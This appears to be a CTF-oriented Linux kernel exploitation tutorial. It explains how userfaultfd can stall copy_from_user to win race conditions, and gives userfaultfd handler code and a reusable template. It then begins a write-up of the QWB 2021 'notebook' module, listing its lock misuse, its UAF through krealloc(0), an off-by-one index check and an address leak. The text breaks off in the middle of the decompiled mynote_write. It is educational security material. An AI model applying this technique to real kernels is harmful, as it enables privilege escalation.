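kernel - race condition - userfaultfd
userfaultfd
Strictly speaking, userfaultfd is not an exploitation technique; it is just a Linux system call. Through this mechanism a user can handle page faults in user space with a custom page fault handler. Once user space has "taken over" the page faults of a range of virtual memory, a thread that touches that range while executing in the kernel is suspended until user space decides when, and with what data, to fill in the page (that is, until the fault is handled).
The overall userfaultfd flow is as follows: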

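(Figure copied from https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/#userfaultfd%EF%BC%88may-obsolete%EF%BC%89)
How do we use it?
To use the userfaultfd system call, we first create a userfaultfd and register a memory region to watch through ioctl. We also start a dedicated polling thread, the uffd monitor, which keeps calling poll() until a page fault shows up.
When a thread triggers a page fault inside that region (for example, the first access to an anonymous page), that thread (the faulting thread) enters the kernel to handle the fault.
The kernel calls handle_userfault() to hand the fault over to userfaultfd.
The faulting thread then blocks, and a uffd_msg is sent to the monitor thread; the faulting thread waits for the monitor to finish.
The monitor thread resolves the fault through ioctl, with the following options:
UFFDIO_COPY: copy user-supplied data into the faulting page
UFFDIO_ZEROPAGE: zero-fill the faulting page
UFFDIO_WAKE: used together with the UFFDIO_COPY_MODE_DONTWAKE and UFFDIO_ZEROPAGE_MODE_DONTWAKE modes of the two options above to fill pages in batches
Once the fault is resolved, the faulting thread is woken up (by the ioctl itself, or by UFFDIO_WAKE when a DONTWAKE mode was used) and continues its work.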
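The batch-fill option above can be sketched as follows. This is only an illustration under stated assumptions: the helper names prepare_copy_dontwake and prepare_wake are hypothetical and not part of any API; only the structures and the UFFDIO_COPY_MODE_DONTWAKE flag come from <linux/userfaultfd.h>.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <linux/userfaultfd.h>

/* Hypothetical helper: fill a UFFDIO_COPY request that installs one page
 * but leaves the faulting thread asleep (DONTWAKE).
 * page_size must be a power of two. */
static void prepare_copy_dontwake(struct uffdio_copy *req, uint64_t fault_addr,
                                  const void *src, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    memset(req, 0, sizeof(*req));
    req->dst = fault_addr & ~(page_size - 1); /* destination must be page aligned */
    req->src = (uint64_t)(uintptr_t)src;
    req->len = page_size;
    req->mode = UFFDIO_COPY_MODE_DONTWAKE;
}

/* Hypothetical helper: describe the range a later UFFDIO_WAKE should wake. */
static void prepare_wake(struct uffdio_range *range, uint64_t start, uint64_t len)
{
    range->start = start;
    range->len = len;
}
```

The monitor would pass each request to ioctl(uffd, UFFDIO_COPY, &req) and, once every page is in place, issue a single ioctl(uffd, UFFDIO_WAKE, &range).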
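That is the whole flow of the userfaultfd mechanism. It was originally designed for purposes such as virtual machine / process migration, but it also lets us control the order in which threads make progress, which greatly raises the success rate of race condition exploits. Consider an operation like this:
copy_from_user(kptr, user_buf, size);
If the thread is preempted after entering the function but before the copy actually starts, and another thread changes the ownership of the memory kptr points to (for example by kfree-ing it), the copy then becomes a UAF. The odds of that are of course small. But if user_buf is an mmap-ed region for which we registered userfaultfd, the copy triggers a page fault and the thread stays paused until our handler resolves the fault; only then does it continue. This greatly increases the chance of winning the race.
Concrete usage:
Consider a kernel module with a menu-style heap whose operations take no lock at all, or only a read lock. A race condition is then possible. Consider the following race:
Thread 1 keeps allocating and editing chunks
Thread 2 keeps freeing chunks
Thread 3 allocates chunks
Thread 1 may then end up editing a chunk that has already been freed!
Consider this scenario:
We first allocate a chunk with thread 1, but before thread 1 edits it, thread 2 frees the chunk,
and before thread 2 sets the chunk pointer to 0 we switch to thread 3, which gets the freed chunk reallocated as something useful (for example tty_operations),
then we use the edit function of thread 1 to overwrite that chunk and move on to the next stage of the exploit.
Of course that is the ideal case. In practice conditions are rarely this favorable, the hit rate is low, and it is hard to tell whether we hit at all (stating the obvious).
But if thread 1 copies data between user space and kernel space with something like copy_from_user or copy_to_user, we can:
First mmap a block of anonymous memory and register userfaultfd for it. Because it is anonymous mmap memory, no physical page has been allocated for it yet
Thread 1, inside the kernel, copies data between this memory and a kernel object. Touching the userfaultfd-registered memory triggers a page fault, thread 1 blocks, and control passes to the uffd monitor thread
In the uffd monitor thread we can use semaphore P/V operations across threads (the most useful thing from the operating systems course) to tamper with the kernel object thread 1 is working on (for example, as described above, free the object thread 1 is reading or writing and get it reallocated where we want)
Then we let thread 1 continue, and it writes our data to the target we want to write, or reads from the target we want to read
At this point we have used userfaultfd to exploit the race condition; the technique greatly raises the hit rate of such races
First, define the data structures we will need below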
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
void errExit(char * msg)
{
puts(msg);
exit(-1);
}
//...
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
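struct uffdio_register uffdio_register;
Next, the program initializes the freshly created userfaultfd with ioctl(uffd, UFFDIO_API, &uffdio_api). This can be understood as an API handshake with the kernel that formally enables the userfaultfd object: uffdio_api.api gives the userfaultfd interface version in use (UFFD_API), and features set to 0 means no optional extensions are requested. Only after this step succeeds does the kernel start delivering page fault events to user space through the userfaultfd; before that the file descriptor is unusable.
The program then creates an anonymous private mapping with mmap. Because of the MAP_ANONYMOUS | MAP_PRIVATE flags, the memory is not backed by any file and is demand paged: when mmap returns, only the virtual address range has been set up and no physical page has been allocated yet. In other words, the first access to this memory triggers a page fault.
Combined with the userfaultfd created and enabled above, this means we deliberately prepare a region that is guaranteed to page-fault and hand control of that fault to user space. Later, when a thread touches the address, the kernel pauses the thread and notifies user space through userfaultfd, which is the basis for precise control over timing (for example, building a race condition or a UAF window).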
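The demand-paging behavior described above can be observed from user space with mincore(). The sketch below is illustrative only: probe_demand_paging is a hypothetical helper name, and what mincore() reports before the first touch can differ in sandboxed or emulated environments.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: map one anonymous page and report whether it is
 * resident before and after the first write.
 * Returns 0 on success, -1 if mmap() or mincore() fails. */
static int probe_demand_paging(int *before, int *after)
{
    size_t page_size = (size_t)sysconf(_SC_PAGE_SIZE);
    unsigned char vec = 0;
    char *p;

    assert(before != NULL && after != NULL);
    p = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;
    if (mincore(p, page_size, &vec) == -1) {
        munmap(p, page_size);
        return -1;
    }
    *before = vec & 1;   /* residency bit before any access */
    p[0] = 'A';          /* first touch: this is the access that page-faults */
    if (mincore(p, page_size, &vec) == -1) {
        munmap(p, page_size);
        return -1;
    }
    *after = vec & 1;    /* residency bit once the fault has been served */
    munmap(p, page_size);
    return 0;
}
```

With userfaultfd registered on such a page, the first touch is exactly the point at which the toucher would be parked instead of being served by the kernel.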
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
len = 0x1000;
addr = (char*) mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
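errExit("mmap");
Next, the program registers the anonymous region created by mmap with the userfaultfd through ioctl(uffd, UFFDIO_REGISTER, &uffdio_register). In effect we tell the kernel explicitly that page faults raised inside this virtual address range are to be handled by this userfaultfd object.
uffdio_register.range.start gives the start address of the monitored memory
range.len gives the length of the monitored memory, so the whole new mapping is placed under userfaultfd management
mode is set to UFFDIO_REGISTER_MODE_MISSING, meaning we only care about missing pages, that is, pages with no physical page allocated yet
When the program first touches these pages and faults, the kernel does not allocate a physical page right away. It pauses the faulting thread and sends an event to user space through userfaultfd.
Overall, this step binds a piece of not-yet-used memory to the userfaultfd created earlier. From here on, we control when the first access to this memory completes and in what order its page faults are resolved.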
/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
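errExit("ioctl-UFFDIO_REGISTER");
Next, the program uses pthread_create to start a new thread, the monitor polling thread, dedicated to handling events from the userfaultfd. Once the monitor thread is running, the userfaultfd setup is complete; what follows is waiting for a page fault.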
/* Create a thread that will process the userfaultfd events */
int s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0) {
errExit("pthread_create");
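}
The monitor polling thread should look like the following. This version uses UFFDIO_COPY, that is, it copies custom data into the faulting page:
After the thread starts, it blocks in poll on the userfaultfd. When the registered region is first accessed and a page fault is triggered, the kernel posts an event to that fd. The thread then reads the fault information with read and checks that the event type is UFFD_EVENT_PAGEFAULT.
After receiving the fault event, the monitor thread uses UFFDIO_COPY to copy one page of data prepared in user space to the virtual address of the faulting page, which actually fills the missing page and wakes the suspended thread.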
static int page_size;
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;
page_size = sysconf(_SC_PAGE_SIZE);
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
if (page == NULL)
{
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}
/* Loop, handling incoming events on the userfaultfd
file descriptor */
for (;;)
{
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");
printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0)
{
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if (nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if (msg.event != UFFD_EVENT_PAGEFAULT)
{
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Display info about the page-fault event */
printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);
/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */
memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
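}
You may have noticed the odd-looking statement uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);. Its purpose is to round the faulting address down to a page boundary and use that as the start address of the copy. I did not notice it myself at first, but arttnba3's blog points it out, so I record it here.
For example, the faulting address might be 0xdeadbeef. Copying a whole page starting there would land in the wrong place; the copy should start at 0xdeadb000 (assuming a page size of 0x1000).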
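The rounding can be checked in isolation. A minimal sketch; page_align_down and page_offset are hypothetical helper names, and the mask trick assumes the page size is a power of two:

```c
#include <assert.h>
#include <stdint.h>

/* Round addr down to the start of its page (page_size: power of two). */
static uint64_t page_align_down(uint64_t addr, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return addr & ~(page_size - 1);
}

/* Offset of addr inside its page, i.e. the bits the mask above clears. */
static uint64_t page_offset(uint64_t addr, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return addr & (page_size - 1);
}
```

For the address in the text, page_align_down(0xdeadbeef, 0x1000) gives 0xdeadb000 and page_offset gives 0xeef.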
An example:
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
static int page_size;
void errExit(char * msg)
{
printf("[x] Error at: %s\n", msg);
exit(-1);
}
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
if (page == NULL)
{
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}
/* Loop, handling incoming events on the userfaultfd
file descriptor */
for (;;)
{
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");
printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0)
{
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if (nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if (msg.event != UFFD_EVENT_PAGEFAULT)
{
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Display info about the page-fault event */
printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);
/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */
memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}
int main(int argc, char ** argv, char ** envp)
{
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
page_size = sysconf(_SC_PAGE_SIZE);
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
len = 0x1000;
addr = (char*) mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
errExit("mmap");
/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
/* Create a thread that will process the userfaultfd events */
int s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0)
errExit("pthread_create");
/* Trigger the userfaultfd event */
void * ptr = (void*) *(unsigned long long*) addr;
printf("Get data: %p\n", ptr);
return 0;
}
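Note that from kernel 5.11 on this no longer works out of the box for unprivileged users, because newer kernels changed the default value of the variable sysctl_unprivileged_userfaultfd:
From the linux-5.11 source, fs/userfaultfd.c: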
int sysctl_unprivileged_userfaultfd __read_mostly;
//...
SYSCALL_DEFINE1(userfaultfd, int, flags)
{
struct userfaultfd_ctx *ctx;
int fd;
if (!sysctl_unprivileged_userfaultfd &&
(flags & UFFD_USER_MODE_ONLY) == 0 &&
!capable(CAP_SYS_PTRACE)) {
printk_once(KERN_WARNING "uffd: Set unprivileged_userfaultfd "
"sysctl knob to 1 if kernel faults must be handled "
"without obtaining CAP_SYS_PTRACE capability\n");
return -EPERM;
}
//...
From the linux-5.4 source, fs/userfaultfd.c:
int sysctl_unprivileged_userfaultfd __read_mostly = 1;
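//...
As shown, in the older 5.4 kernel sysctl_unprivileged_userfaultfd is initialized to 1, while in newer kernels such as 5.11 it has no initializer, so the compiler places it in the bss segment and it defaults to 0
This means that on newer kernels, by default, an unprivileged process can no longer use userfaultfd to handle faults raised in kernel mode: it needs CAP_SYS_PTRACE (in practice root) or the sysctl set to 1. Bad luck!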
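Before relying on the technique, it can help to check the knob on the target. A minimal sketch, assuming the sysctl is exposed at /proc/sys/vm/unprivileged_userfaultfd (it is absent on kernels that predate the knob); read_sysctl_int and unprivileged_uffd_setting are hypothetical helper names:

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: return the integer stored in a sysctl file,
 * or -1 if the file is missing or unreadable. */
static int read_sysctl_int(const char *path)
{
    int value = -1;
    FILE *f;

    assert(path != NULL);
    f = fopen(path, "r");
    if (f == NULL)
        return -1;
    if (fscanf(f, "%d", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}

/* 1: unprivileged use allowed, 0: restricted, -1: knob not available. */
static int unprivileged_uffd_setting(void)
{
    return read_sysctl_int("/proc/sys/vm/unprivileged_userfaultfd");
}
```

A result of 0 matches the 5.11 behavior shown above, where the syscall returns -EPERM unless the caller has CAP_SYS_PTRACE or passes UFFD_USER_MODE_ONLY.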
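A userfaultfd template for CTFs
On older kernels this is still very convenient. Here is the template given by arttnba3 (this part is copied directly from arttnba3's blog; I will remove it on request):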
static pthread_t monitor_thread;
void errExit(char * msg)
{
printf("[x] Error at: %s\n", msg);
exit(EXIT_FAILURE);
}
void registerUserFaultFd(void * addr, unsigned long len, void *(*handler)(void *))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
s = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
if (s != 0)
errExit("pthread_create");
}
To use it, just call:
registerUserFaultFd(addr, len, handler);
Pay attention to how the handler is written. This one is adapted directly from the Linux man page and can be customized as needed:
static char *page = NULL; // the data you want copied in
static long page_size;
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg;
static int fault_cnt = 0;
long uffd;
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long) arg;
for (;;)
{
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
/*
* [pause here]
* When poll returns, a page fault has occurred.
* You can insert operations here, for example sleep().
*/
if (nready == -1)
errExit("poll");
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0)
errExit("EOF on userfaultfd!\n");
if (nread == -1)
errExit("read");
if (msg.event != UFFD_EVENT_PAGEFAULT)
errExit("Unexpected event on userfaultfd\n");
uffdio_copy.src = (unsigned long) page;
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
}
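}
Worked example:
As usual, we close out the technique with a challenge: QWB (Qiangwang Cup) 2021 online round - notebook
A quick look at the challenge
First, the startup script:
stty intr ^]: rebinds the interrupt key from the default Ctrl+C to Ctrl+]
exec timeout 300: the VM runs for at most 300 seconds (5 minutes)
smap, smep and kaslr are enabled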
#!/bin/sh
stty intr ^]
exec timeout 300 qemu-system-x86_64 -m 1024M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap -monitor /dev/null 2>/dev/null -s
Check /sys/devices/system/cpu/vulnerabilities/*:

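KPTI (kernel page table isolation) is enabled
To make debugging easier, the leading part of the script described above is removed here
Now look at the vulnerable module:
The module registers a misc device (a Linux kernel mechanism for quickly registering a character device, that is, a simplified character device registration interface), initializes a read-write lock named lock, and defines three custom interfaces: ioctl, read and write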

Relationship diagram:
/dev/notebook
|
v
mynote_dev (data)
|
v
mynote_fops (rodata)
|
+--> mynote_write
|
+--> mynote_ioctl
|
+--> noteadd
+--> notedel
+--> noteedit
+--> notegift
The module defines an array notebook of struct note. The struct has two members: size stores the size of the chunk, and note stores the pointer to the chunk


Through ioctl the device emulates a heap, offering create, edit and free operations on chunks, plus a gift function

noteadd
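Analysis of this part:
notebook holds at most 16 entries
A read lock guards what is really a write: the old size is saved and then overwritten directly
Only objects no larger than 0x60 can be requested. The user data is not copied into the object itself but into the name character array
In (void *)_kmalloc(size, 0x24000C0), the value 0x24000C0 is the standard allocation flag, GFP_KERNEL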
__int64 __fastcall noteadd(size_t idx, size_t size, void *buf)
{
__int64 v3; // rdx
__int64 v4; // r13
note *v5; // rbx
size_t size_1; // r14
__int64 v7; // rbx
_fentry__();
if ( idx > 0xF )
{
v7 = -1;
printk("[x] Add idx out of range.\n", size);
}
else
{
v4 = v3;
v5 = &notebook[idx];
raw_read_lock(&lock);
size_1 = v5->size;
v5->size = size;
if ( size > 0x60 )
{
v5->size = size_1;
v7 = -2;
printk("[x] Add size out of range.\n", size);
}
else
{
copy_from_user(&name, v4, 0x100);
if ( v5->note )
{
v5->size = size_1;
v7 = -3;
printk("[x] Add idx is not empty.\n", v4);
}
else
{
v5->note = (void *)_kmalloc(size, 0x24000C0);
printk("[+] Add success. %s left a note.\n", &name);
v7 = 0;
}
}
raw_read_unlock(&lock);
}
return v7;
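}
noteedit
Throughout the edit path the module still takes only raw_read_lock while modifying shared state: updating note->size, calling krealloc, and rewriting the note->note pointer. If the size differs, krealloc is called, and 256 bytes of user data are copied into the global variable name
edit does not limit size, so although add caps the size, edit still lets us obtain an object of arbitrary size
edit takes the read lock, so several threads can run it concurrently
Passing size 0 results in krealloc(buf, 0), which frees the object, so a race gives us a use after free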
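The window can be pictured with a small user-space model. This is not the module's code: struct note_model and the two phase functions are hypothetical, the free is represented by a flag rather than a real kfree, and the only thing modeled is the ordering around copy_from_user.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model of one notebook entry. */
struct note_model {
    size_t size;
    void *ptr;
    int freed;   /* set once the backing object has been released */
};

/* Phase 1: what noteedit does before it reaches copy_from_user(). */
static void edit_before_copy(struct note_model *n, size_t newsize)
{
    assert(n != NULL);
    n->size = newsize;
    if (newsize == 0)
        n->freed = 1;   /* models krealloc(ptr, 0) freeing the object */
}

/* Phase 2: what noteedit does after copy_from_user() returns. */
static void edit_after_copy(struct note_model *n)
{
    assert(n != NULL);
    if (n->size == 0)
        n->ptr = NULL;  /* only now is the stale pointer cleared */
}

/* A dangling pointer exists whenever the object is freed but still referenced. */
static int is_dangling(const struct note_model *n)
{
    return n->freed && n->ptr != NULL;
}
```

If a thread is parked between the two phases, which is what a userfaultfd-backed buffer achieves, is_dangling() stays true for as long as the monitor withholds the page.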
__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
__int64 v3; // rdx
__int64 v4; // r13
note *v5; // rbx
size_t size; // rax
note *note; // r12
__int64 n2; // rbx
_fentry__();
if ( idx > 0xF )
{
n2 = -1;
printk("[x] Edit idx out of range.\n", newsize);
return n2;
}
v4 = v3;
v5 = &notebook[idx];
raw_read_lock(&lock);
size = v5->size;
v5->size = newsize;
if ( size == newsize )
{
n2 = 1;
goto editout;
}
note = (note *)((__int64 (__fastcall *)(void *, size_t, __int64))&krealloc)(v5->note, newsize, 37748928);
copy_from_user(&name, v4, 256);
if ( !v5->size )
{
printk("free in fact", v4);
v5->note = 0;
n2 = 0;
goto editout;
}
// Checks that this virtual address lies in the kernel's direct mapping (linear map) and can be translated to a physical address.
if ( (unsigned __int8)_virt_addr_valid(note) )
{
v5->note = note;
n2 = 2;
editout:
raw_read_unlock(&lock);
printk("[o] Edit success. %s edit a note.\n", &name);
return n2;
}
printk("[x] Return ptr unvalid.\n", v4);
raw_read_unlock(&lock);
return 3;
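}
notedel
Frees an object
notedel accepts indexes up to 0x10, one past the end of the 16-entry array, so there is an out-of-bounds risk
If size is 0, notedel() does not clear the entry. However, the earlier operations go through krealloc(size) and kmalloc(size), and kmalloc(0) / krealloc(0) do not allocate an object, so this is of little use here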
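The off-by-one can be made concrete by comparing the two index checks seen in the decompilation. A small sketch; the helper names are hypothetical and NOTE_NUM mirrors the 16-entry notebook array:

```c
#include <assert.h>
#include <stddef.h>

#define NOTE_NUM 16   /* notebook has 16 entries: valid indexes are 0..15 */

/* Mirrors noteadd/noteedit: rejects when idx > 0xF. */
static int add_check_accepts(size_t idx)
{
    return !(idx > 0xF);
}

/* Mirrors notedel/mynote_read/mynote_write: rejects when idx > 0x10. */
static int del_check_accepts(size_t idx)
{
    return !(idx > 0x10);
}

/* Returns the first index a check lets through although it is out of
 * bounds, or -1 if there is none below limit. */
static long first_oob_accepted(int (*check)(size_t), size_t limit)
{
    size_t idx;

    assert(check != NULL);
    for (idx = 0; idx < limit; idx++)
        if (check(idx) && idx >= NOTE_NUM)
            return (long)idx;
    return -1;
}
```

Running first_oob_accepted over both checks shows that only the idx > 0x10 variant lets an out-of-bounds index through.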
__int64 __fastcall notedel(size_t idx)
{
__int64 v1; // rsi
note *v2; // rbx
_fentry__();
if ( idx > 0x10 )
{
printk("[x] Delete idx out of range.\n", v1);
return -1;
}
else
{
raw_write_lock(&lock);
v2 = &notebook[idx];
kfree(v2->note);
if ( v2->size )
{
v2->size = 0;
v2->note = 0;
}
raw_write_unlock(&lock);
printk("[-] Delete success.\n", v1);
return 0;
}
}
notegift
Copies the notebook array to user space, which directly reveals the addresses of the objects we allocated
__int64 __fastcall notegift(void *buf)
{
__int64 v1; // rsi
_fentry__();
printk("[*] The notebook needs to be written from beginning to end.\n", v1);
copy_to_user(buf, notebook, 256);
printk("[*] For this special year, I give you a gift!\n", notebook);
return 100;
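}
Note:
From the analysis above, the operations use a read-write lock, but add and edit take it for reading while delete takes it for writing
A read lock can be held by several threads at once, so they can all be inside the critical section together (as long as no writer holds the lock), whereas a write lock can be held by only one thread, so only one can be inside the critical section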
mynote_read
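A simple implementation: the third argument of the read system call is used as the note index, the matching entry is fetched from the global notebook array, its recorded size is used as the read length, and the kernel memory that the note pointer refers to is copied to user space. The index check (idx > 0x10) is off by one, so there is a bounds risk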
ssize_t __fastcall mynote_read(file *file, char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 n0x10; // rdx
unsigned __int64 n0x10_1; // rdx
size_t size; // r13
note *note; // rbx
_fentry__();
if ( n0x10 > 0x10 )
{
printk("[x] Read idx out of range.\n", buf);
return -1;
}
else
{
n0x10_1 = n0x10;
size = notebook[n0x10_1].size;
note = (note *)notebook[n0x10_1].note;
_check_object_size(note, size, 1);
copy_to_user(buf, note, size);
printk("[*] Read success.\n", note);
return 0;
}
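}
mynote_write
Writes content into the given note. Its behavior mirrors mynote_read: the third argument of the write system call is used as the index, the matching entry is fetched from the global notebook array, its recorded size is used as the write length, and user data is copied into the note buffer kept in the kernel. The same off-by-one index check applies, so there is a bounds risk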
ssize_t __fastcall mynote_write(file *file, const char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 n0x10; // rdx
unsigned __int64 n0x10_1; // rdx
size_t size; // r13
note *note; // rbx
_fentry__();
if ( n0x10 > 0x10 )
{
printk("[x] Write idx out of range.\n", buf);
return -1;
}
else
{
n0x10_1 = n0x10;
size = notebook[n0x10_1].size;
note = (note *)notebook[n0x10_1].note;
_check_object_size(note, size, 0);
